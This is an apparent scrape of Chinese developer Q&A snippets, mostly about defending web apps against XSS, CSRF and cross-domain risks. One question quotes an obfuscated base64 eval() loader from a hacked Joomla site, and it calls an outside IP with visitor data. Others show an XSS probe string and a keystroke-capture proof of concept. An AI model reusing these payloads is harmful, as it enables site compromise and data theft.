1回答
我读了很多关于跨站脚本的内容,比如Flash,Javascript等等,我还发现了一些网站的列表,这些网站都有一个允许从任何服务器访问的crossdomain.xml。例如,flickr.com信任所有域。
有人能给我解释一下为什么这看起来是安全的,而不会导致会话劫持之类的攻击吗?是不是因为这些crossdomain.xml只在子域上有效,所以攻击者不可能获得会话密钥?
浏览 3提问于2010-09-14得票数 2
回答已采纳
我想保护一个ASP.NET网络应用程序免受黑客攻击。是否有一个特定于ASP.NET的任务列表,专门编写代码以使ASP.NET更安全?超出了上提到的内容。我对如何避免跨站请求伪造和跨站脚本的代码示例的具体步骤感兴趣。
我知道如何使用SQL参数进行sql注入,在连接到SQL server时进行Windows身份验证,以及在服务器上验证表单的输入。
浏览 1提问于2009-10-01得票数 6
回答已采纳
我正在使用Fortify静态代码分析来分析我们的软件。Fortify报告我们有一个跨站点脚本漏洞(反映的),而我并不认为我们真的有。
我可以试着与我的客户争论这一点,让他们相信它是安全的(这是没有人想做的,因为它需要审计),或者让Fortify高兴;
我从ASP.NET中的请求中获取一个表单参数,然后‘手动’(不使用API)对其进行转义(转义所有换行符、字符、引号并删除任何脚本标记)。然后我将其转储回浏览器,作为
output.Write("var enteredText = \"" + htmlEscape( Form.Params["enteredText&
浏览 0提问于2014-05-10得票数 0
3回答
我在运行一个Joomla 1.7网站,它今天被黑了。下面的脚本完成了黑客攻击。
eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJ
浏览 4提问于2013-02-20得票数 3
回答已采纳
我发现这段由发布的优秀代码是对以下问题的回答:
您可以编写动态脚本标记(使用原型):
新元素(“script”,{src:"myBigCodeLibrary.js",类型:"text/javascript"});
这里的问题是,我们不知道何时外部脚本文件是完全加载。
我们通常希望我们的依赖代码位于下一行,并且喜欢编写如下这样的代码:
如果(iNeedSomeMore){ Script.load("myBigCodeLibrary.js");//包含myFancyMethod()的代码;myFancyMethod();//酷,不需要回调!}
有一
浏览 0提问于2009-02-27得票数 5
回答已采纳
我试图使用jQuery的ajax方法访问不同域上的web服务。在做了一些研究之后,它看起来不允许这样做,这是为了防止跨站点脚本。
我遇到了一个解决方案,其中包括这一行:
$.support.cors = true;
在我的javascript代码的顶部。据我所知,这可以在jQuery中实现跨站点脚本。
拥有这行代码会让我的站点更容易受到攻击吗?我经常听到XSS作为一个安全问题被讨论,XSS有合法的用途吗?
浏览 3提问于2011-10-22得票数 52
回答已采纳
我们最近收到了来自的以下电子邮件(删除真实网址的nospam_ )。
谢谢你方的及时答复。我们已经确定我们的项目易受JQuery跨站点脚本漏洞的影响。
JQuery版本1.11.3的副本包含在这里的项目中。通过执行非显式数据类型,JQuery容易受到跨站点脚本的攻击。我们项目中使用的代码中易受攻击的部分在这里可以看到。
为了缓解这个问题,我们建议将JQuery升级到3.0.0。
jQuery 1.x实际上不安全吗?
浏览 3提问于2016-06-30得票数 2
回答已采纳
1回答
帧onkeydown反馈
、、、、
我正在尝试做一个跨框架脚本攻击()的PoC,以在我的工作中显示这种攻击对于任何版本的IE浏览器都是多么危险。通过在IE8或更高版本上使用X-FRAME-OPTIONS: deny报头,可以轻松防止此攻击。但是,如果每个开发人员在所有web服务器响应中都包含这样的标头,那就更好了。使用下面的代码,我可以看到带有键代码的警告窗口,但是对于目标页面上的表单,我看不到表单内部按下的键的字母。
<script>
window.onkeydown = function() {
alert(window.event.keyCode);
浏览 4提问于2014-01-26得票数 0
我正在制作跨域jQuery get(),它失败了,并出现了"405 jQueryget()“错误。
我的Greasemonkey脚本是这样的:
// ==UserScript==
// @include http://www.foobar.com/*
// ==/UserScript==
var query = "www.foobar.com";
$.get(
url,
function(response){
alert(response);
},
浏览 2提问于2011-11-18得票数 2
1回答
跨站脚本( XSS )是由于spring中的缺陷而发生的攻击,XSS是前端问题,browsers.As没有遵循任何机制来防御XSS吗?
浏览 1提问于2018-06-01得票数 0
1回答
我有一个页面(page1),它将一个不同的页面(page2)加载到模式弹出窗口中。这个新页面(page2)有两个外部脚本,它们应该在页面加载时触发。如果我自己加载AJAX页面,这可以很好地工作,但是当我尝试从另一个页面(page1)调用它们时,它们根本不会触发。
现在,棘手的部分是,脚本是由用户插入到内容管理系统中的,包括脚本标记-脚本实际上只是到不同服务器(LinkedIn)上的外部脚本的链接。很有趣很有趣!
有没有什么办法我可以强制这些脚本在加载时触发?
浏览 1提问于2011-11-10得票数 0
回答已采纳
我编写了一个powershell脚本来调用sqlcmd.exe,以便在远程sql服务器上执行一个sql脚本。powershell脚本检查$LASTEXITCODE。如果$LASTEXITCODE为非零,则抛出“脚本失败。返回代码为$LASTEXITCODE”。
该脚本被多次用于执行不同的sql脚本,并且是在部署期间运行的powershell脚本链的一部分。
该脚本大多数情况下运行良好,但返回代码为-1073741502时随机失败。
这是在升级到SQL2008之后才开始的,我不能手动运行单个powershell脚本或sql脚本来再现它。
这是powershell命令:
&sql
浏览 2提问于2012-01-04得票数 3
提前感谢您的帮助!
我正在建立一个网站的商业催化剂,并已在其中使用jCarousel。测试地点是it4kids.businesscatalyst.com。
我不能让3个jCarousel实例在FF中工作,但在IE中都很好。我有9.0.81110.16421 IE和10.0.1 FF
我在Firebug中可以看到,SCRIPTS.JS文件中有一个错误,如下所示:
区块报价
安全错误
在此错误上中断,如果(sheetssheetIndex.cssRules欧元/ sheetssheetIndex.rules){ SRIPTS.JS行717
区块报价
此错误不会出现在IE中(当使用Firebug
浏览 4提问于2012-02-15得票数 0
我在我的MVC2站点中收到以下错误:未找到路径'/crossdomain.xml‘的控制器,或者该控制器未实现IController。
根据一些研究,该文件似乎与防伪和跨站点脚本(XSS)攻击有关。我的MVC2站点是否需要crossdomain.xml文件?
浏览 0提问于2011-03-14得票数 5
回答已采纳
1回答
我有一个powershell脚本,它作为一个计划的任务运行,并被触发来运行“工作站解锁”。如果SSTP连接在工作站锁定期间断开连接,则脚本被编程以重新连接该连接。我想将用户名和密码传递给脚本,这样就不会提示用户两次输入相同的信息(一次用于工作站解锁,另一次用于VPN连接),域名和pass与vpn用户名和pass相同。System.Security.Principal.WindowsIdentity::GetCurrent()将不允许我访问当前登录用户的密码。还有别的办法吗??
谢谢
浏览 0提问于2013-09-05得票数 1
2回答
PHP安全漏洞的渗透测试
、、、
我正在做一篇关于“识别和测试网站安全漏洞”的本科生研究论文。最初,我认为我应该手动测试,因为我在我的方法中指定,我只测试几个选定的漏洞,即SQL注入,跨站脚本,错误报告,会话劫持和输入验证。但当我继续研究时,我发现所有的文章和教程都建议使用软件。
我有几个我的伙伴管理的网站,所以我想在他们的网站上进行测试。我正在检查半打网站上的一些漏洞。我应该使用渗透测试工具,还是只做动态渗透测试而不使用软件?
浏览 2提问于2015-05-25得票数 2
回答已采纳
当我查看我的google分析时,我发现在查询参数中有一些带有脚本的定期请求,类似于
/about?RaNDMPRMz='-function(){debugger}()-">\"><scrIpt>debugger</scrIpt><aUdio src=x oNerror=debugger><"-'-function(){debugger}()
它几乎出现在所有可用的页面中,如/home/、/events/.这类查询意味着什么,我应该担心吗?
浏览 3提问于2015-09-22得票数 0
回答已采纳
2回答
在web应用程序的上下文中,漏洞扫描是否是一种形式的模糊?
我被告知情况并非如此,但我知道的是:
Wikipedia将模糊定义为“向计算机程序的输入提供无效、意外或随机的数据”。
Web应用程序漏洞扫描器发送无效的意外数据,以识别SQL注入或跨站点脚本等漏洞。
浏览 0提问于2016-05-29得票数 1
回答已采纳
我如何为我的Drupal 6网站申请补丁,该网站到目前为止运作得还不错?
我检查了Drupal 7中的修补程序,它使用的是sanitize()。如何将其添加到Drupal 6中?
同时,我正在努力将它升级到Drupal 8。
浏览 0提问于2018-03-29得票数 0
回答已采纳
XSS的
定义如果您搜索web,有许多不同的方法来定义跨站点脚本攻击。简单地说,XSS漏洞发生在允许恶意攻击者将客户端脚本插入到其他成为攻击受害者的人查看的网站中时。
--AndroidO.S
中XSS错误的一个例子
恶意Android应用程序通过向Chrome发送精心编制的详细信息,可以将JavaScript: URI注入到加载在Chrome中的任意网页中。注入的JavaScript工作在目标网页的域的上下文中,而不是空白域。所以它可以用来偷饼干之类的东西。这类漏洞通常称为跨应用程序脚本。版本Chrome版本:ChromeforAndroidv18.0.1025123操作系统:在Androi
浏览 0提问于2015-05-22得票数 7
3回答
所以我在谷歌上搜索这个问题,找不到任何明确的例子,因为几乎所有相关的故事都是关于用户登录的网站等。
所以我的场景是这样的,asp.net MVC3网站,没有用户登录,什么都没有。我确实有一些表格,但是,接触和一些计算功能。
我使用Nhibernate,并将我的Smtp服务器凭证放在代码本身中,而不是web.config中。我还有一个自定义的错误页面和post方法,它们都有HttpPost属性。
作为最后一个特性,我有一个AJAX/json get方法,它可以获取标题列表(这个控制器方法有AcceptVerbs(HttpVerbs.Get)属性)。
我是不是遗漏了一些大的安全漏洞(sql注入,跨
浏览 2提问于2012-05-18得票数 0
回答已采纳
我正在为存储的跨站点脚本漏洞创建一个bug赏金报告,该漏洞可能还会导致权限提升。
bug赏金程序将Stored XSS划分为低临界度,将Privilege Escalation划分为中等临界性。因此,对于特权提升,您将得到更高的赏金。
这是利用程序的工作方式:
我(作为employee)可以在web应用程序的页面中插入恶意JavaScript。
此JavaScript存储在数据库中,并将在访问该特定页面的每个用户处执行。
我创建了一个JavaScript有效负载,当另一个管理员访问页面时,它给了我admin角色(基本上我只是在使用管理员的会话复制POST调用)。
这种利用会被认为是Stored
浏览 0提问于2016-12-18得票数 1
我制作了简单的tryItYourself类型codeEditor。进入文本区域,我编写代码。当单击按钮renderCode时,代码将在它旁边的div中呈现。但是,每当我在文本编辑器中使用<script>标记时,它都不会呈现标签中的任何内容。
这是密码。
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Untitled Document</title>
<style>
#area {
width: 48%;
浏览 5提问于2015-08-13得票数 0
回答已采纳
我的主机是www.example.com,我使用URL www.example.com/html-url.html为html页面提供服务。在这些html中,我包含了来自S3桶的javascript文件,比如bucket-name。
OWASP扫描正在提高此跨域JavaScript源文件包含证据:<script src="bucket-name/custom.js" type="text/javascript"/>的低级别警报。
问题:是否可以配置配置中的受信任资源/URL列表?我在用NGINX服务器。请注意,出于某些原因,我需要获得一个干净的漏洞扫描
浏览 5提问于2020-12-02得票数 0
我正在尝试使用javascript中的SOAP-webservice。服务器和客户端都在同一个局域网中,由我来控制。
当我尝试发送一个请求时,我得到了:
XMLHttpRequest cannot load .
Origin is not allowed by Access-Control-Allow-Origin.
这可能是因为跨源脚本?我想在服务器端解决这个问题。这意味着:在传出消息上添加额外的头部: Access-Control-Allow-Origin:*
如何添加这些响应头?我正在使用Netbeans来管理Glassfish中的web服务
浏览 0提问于2012-07-02得票数 0
我想为一些网站启用跨站点脚本。具体地说,我想提交一个网页表单到第三方网站,我已经为网页表单的响应设置了一个子iframe的目标iframe,现在我希望我的代码在主窗口中检索响应网页的内容。
我假设只需在Internet Explorer中禁用XSS筛选器即可完成上述操作,这样的假设正确吗?或者还需要一些其他的东西?另外,我如何在Firefox中启用跨站点脚本(对于相同的场景?)
浏览 3提问于2011-08-20得票数 1
回答已采纳
我的问题是针对反映XSS攻击的。
当可注入参数是URL的一部分时,反映跨站点脚本攻击的可能性很大吗?我知道头部中的易受攻击参数也可以用来使用flash和其他客户端技术发起攻击。但是,我暗示了这一点,因为在这次攻击的大多数执行情况下,受害者都需要单击精心构建的URL。有谁能解释一下是否还有其他方法(仅反映XSS )。举一些例子会有帮助。
浏览 0提问于2016-08-11得票数 1
CAT.NET说我的网站有一个跨站重定向漏洞。它说下面的代码有问题,可能会导致重定向攻击。
this.Response.Redirect(this.Page.Request.Url.ToString());
我相信当URL中存在用户可控制的输入时,就会发生重定向攻击。但在这种情况下,URL中不存在任何用户输入。
有没有人能告诉我这真的是一个问题,还是仅仅是一个误报?如果这确实是一个问题,那么为什么会这样呢?解决方案是什么?
浏览 1提问于2014-01-24得票数 0
3回答
是否有任何服务,或测试套件或其他东西,我可以运行我的网站,并暴露任何主要的安全缺陷。我不希望我需要担心黑客,但我想消除容易被利用的安全风险。例如SQL注入、跨站脚本等。
浏览 0提问于2012-02-28得票数 1
回答已采纳
我已经使用strip_tags方法为其他输入法编写了脚本,但它不适用于Summernote。
是否可以使用script_tags或任何其他方法阻止跨站点脚本?
我已经尝试过使用strip_tags方法,但它不起作用。
$a['description'] = strip_tags($data['description']); //In the Controller
<textarea id='summernote' name="description">//In the form
我想把代码保存在数据库中,而不是只使用脚
浏览 0提问于2019-08-23得票数 0
我们正在使用jQuery,我在国家漏洞数据库中遇到了以下jQuery漏洞:
在较新版本的jQuery中是否已修复此问题?该漏洞的原始发布日期为4/30/2007。
我正在努力确保我们使用的小jQuery不会暴露这个漏洞,有没有人有这样的例子?
浏览 22提问于2010-02-24得票数 2
回答已采纳
2回答
如何推荐(更多)安全路由器
、、、、
一位同事要求我为她的小生意推荐一台路由器。我要求她提供一个规范列表,在她的列表中,她指定了安全。
嗯,我们都知道在科技界没有什么是完全安全的,但我开始为她研究路由器安全。我的第一站是CERT漏洞数据库。我输入了路由器制造商的名字,(有点)惊讶地看到有多少路由器存在严重的漏洞。
除了搜索CERT之外,还有哪些其他特定的方法可以帮助完成这一任务?
下面是我在想的事情的类型:
其他在线资源或数据库。据我所知,CERT有意隐藏他们的一些报告。
公开的开发和渗透测试结果。
进行测试的软件。
执行测试的在线工具。
需要考虑的一系列标准。
还要别的吗。
浏览 0提问于2016-04-25得票数 7
1回答
有人知道管理Web应用程序安全漏洞的方法吗?我正在寻找一个工具,可以集成硒和或打嗝。我想要一遍又一遍地做测试。在应用程序中,我们需要在应用程序中的某个点来利用某些漏洞。我不确定这样的事情是否存在,但我想我会问。开源会更好。
浏览 0提问于2016-01-07得票数 -2
1回答
我正在尝试使用户能够更改他们的密码。
我不断得到用户名和密码不在文件中,我怀疑密码不能被脚本正确读取,可能是因为md5加密。我的SQL查询是否有错误?
$query = "SELECT * FROM users WHERE name='$e' AND pass='".md5($p)."'";
$result = mysql_query($query) or die ("Error in query: $query. ".mysql_error());
$num = mysql_num_rows
浏览 0提问于2012-05-10得票数 1
回答已采纳
所以我有一个程序,通过运行在localhost:8080上的HTTP来提供JSON,我希望能有一个前端连接到它(AngularJS)。
我很想知道是否有什么方法可以在不引入对ASP.NET或PHP等东西的依赖的情况下与这样的服务交互,以便充当服务和浏览器之间的代理。
我懂同源策略,跨站脚本威胁呀。感谢所有建设性的贡献。
浏览 0提问于2013-04-20得票数 0
回答已采纳
Checkmarx对我正在开发的Codebase进行了分析,它返回了一个包含“存储XSS”问题的报告。该问题指出:
方法GetHomepageFilterByLocale HomepageRepo.cs为Select从数据库中获取数据。然后,该元素的值在代码中流动,而不经过适当的筛选或编码,并最终在方法GetProductsByFilterType HomepageController.cs中显示给用户。这可能会启用存储的跨站点脚本攻击。
是否有标准建议的方法来解决这个问题?
请参阅下面这两种方法的代码片段。
HomepageRepo.cs
public HomepageFilter GetH
浏览 2提问于2016-11-11得票数 4
尝试在bin目录中使用./elasticsearch启动elasticsearch 2.4.6。它就会关闭,什么也不会发生。请看下面的截图
浏览启动脚本,我可以看到它一直出现到exec "$JAVA" $JAVA_OPTS $ES_JAVA_OPTS -Des.path.home="$ES_HOME" -cp "$ES_CLASSPATH" org.elasticsearch.bootstrap.Elasticsearch start "$@"行,然后关闭。
但是,请注意,elasticsearch 5.*没有这个问题,
浏览 23提问于2018-01-25得票数 1
回答已采纳
1回答
我正在使用tomcat 5.5.36。我用JSP构建了一个应用程序。我使用了"toolOwasp Zap安全工具“来扫描我的应用程序。在报告中,我发现了一个与XSS相关的问题。我正在使用一个表单来登录用户,并将其与帖子发送。
在报告中,它说跨站点脚本(反映)
参数-用户名攻击- </span><script>alert(1);</script><span>证据- </span><script>alert(1);</script><span>
我正在使用会话id对用户进行身份验证。我读过一些关
浏览 1提问于2016-04-04得票数 1
CSRF同步令牌在一定程度上是有意义的。有人能用孩子气的方式向我解释一下吗?
当用户登录时,会给他们一个会话ID和一个CSRF。会话ID存储在会话cookie中,CSRF令牌仅存储在页面上,最好是隐藏字段中。当用户提交需要特殊权限的请求时,CSRF令牌将与其一起发送。服务器验证它是用户,并提交操作。
好吧,这就是我遇到问题的地方。如果用户的会话id与任何其他身份被窃取,比如来自中间人的攻击,这不需要XSS。恶意用户不是会被赋予与会话相同的CSRF令牌吗?
为了预防,请忽略标题答案*
浏览 0提问于2016-10-18得票数 0
回答已采纳
我有一个wordpress 4.7.6没有插件,但是我注意到:https://cxsecurity.com/cveshow/CVE-2017-14723和其他的漏洞都是<4.8.2的。
我的问题是,我试图在我的wordpress中寻找如何利用它,但我没有找到如何利用它。我很感谢你的帮助,我假设如果它是<4.8.2,它是脆弱的,对吗?
浏览 0提问于2017-10-26得票数 1
1回答
文件连接和PCI遵从性?
、、、
好的,所以我已经设置了一个Docusign到第三方应用程序(Infusionsoft),并让它工作得很好。
它们本机不一起工作,所以我创建了一个php脚本,它读取docusign信封中的选项卡,并将其传递给Infusionsoft,以及完整信封本身的副本。
现在我想通过这个来传递支付信息,因为我在DocuS传中的文档模板之一是一份账单协议。我已经用虚拟信息做了一个测试运行,我能够很好地做到这一点,但是,我现在必须关注PCI在这方面的遵从性,对吗?
我有一个专用服务器,其域具有SSL证书,该证书承载php脚本,它不存储任何信息。它只是传递docusign (通过使用docusign收集),然后格
浏览 0提问于2015-04-07得票数 0
回答已采纳
我正在处理的JavaScript似乎在比ChromeMobile45更高的版本上工作。我无法在调试时找到正在发生的事情,但我认为可能不推荐使用一种方法。有人知道使用哪种方法,或者如何调试它,以便自己更好地调查它吗?
这是一项功能:
<script>
function cxc(x, group) {
mixtracker.track("CXC", "cxc(" + x + ")", group);
var navU = navigator["userAgent"];
浏览 2提问于2017-08-10得票数 0
回答已采纳
1回答
在什么情况下,在请求中拥有视图状态可以防止CSRF攻击?声称,即使请求中存在视图状态,它仍然容易受到CSRF的攻击。然而,利用漏洞并不能解释为什么会出现这种情况。
浏览 0提问于2012-07-23得票数 1
回答已采纳
我有一个混合应用程序-一个简单的网页查看打开网站(单页角网站)。
我从谷歌商店收到了一条安全信息:
您的应用程序包括一个易受跨应用脚本攻击的WebView。详情请参阅谷歌帮助中心的文章。易受攻击类: WebActivity->setWebView 交叉脚本您的应用程序正在使用易受跨应用程序scripting.To攻击的WebView来解决这个问题,请按照谷歌帮助中心文章()中的步骤操作。
我试过“你可以为你的清单中的活动设置android:exported=false。”--这阻止了整个应用程序的启动。当我打开这个应用程序时,它什么也不做,而是显示“anything”消息。
我在“宣言”
浏览 7提问于2020-05-20得票数 1
2回答
我想检查和验证我的C#/Asp.net应用程序中的安全威胁,并想知道是否有任何C#,asp.net安全库可以检查常见的攻击,如会话劫持,DoS,脚本注入等?
浏览 1提问于2012-01-03得票数 4
我的react有axios (依赖项)和json-server (开发依赖项)不饱和,在我这样做之后,我的react开始发布以下警告消息:
[Deprecation] SharedArrayBuffer will require cross-origin isolation as of M91, around May 2021.
这是什么,我如何解决错误,为什么会发生这种情况?
我是这个领域的初学者,错误中提供的链接使用的是我无法理解的高级语言,是控制台中提供的链接。
浏览 4提问于2021-04-19得票数 0
回答已采纳
我知道PHP中的空字节可能会导致一些安全问题,比如LFI/RFI。我检查了手册,它说“由于空字节表示C中字符串的结尾,包含它们的字符串不会被完全考虑,而只是在出现空字节之前才被考虑”。所以我决定自己测试,但遇到了一些问题。
我编写了一个测试代码片段,如下所示:
<?php
$a=$_GET['a'];
echo $a;
include $a.'.jpg';
//include 'a.txt';
此脚本的文件名为"index1.php“。我通过url http://localhost/Demo/inde
浏览 1提问于2014-04-08得票数 0
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频活动推荐
腾讯云开发者
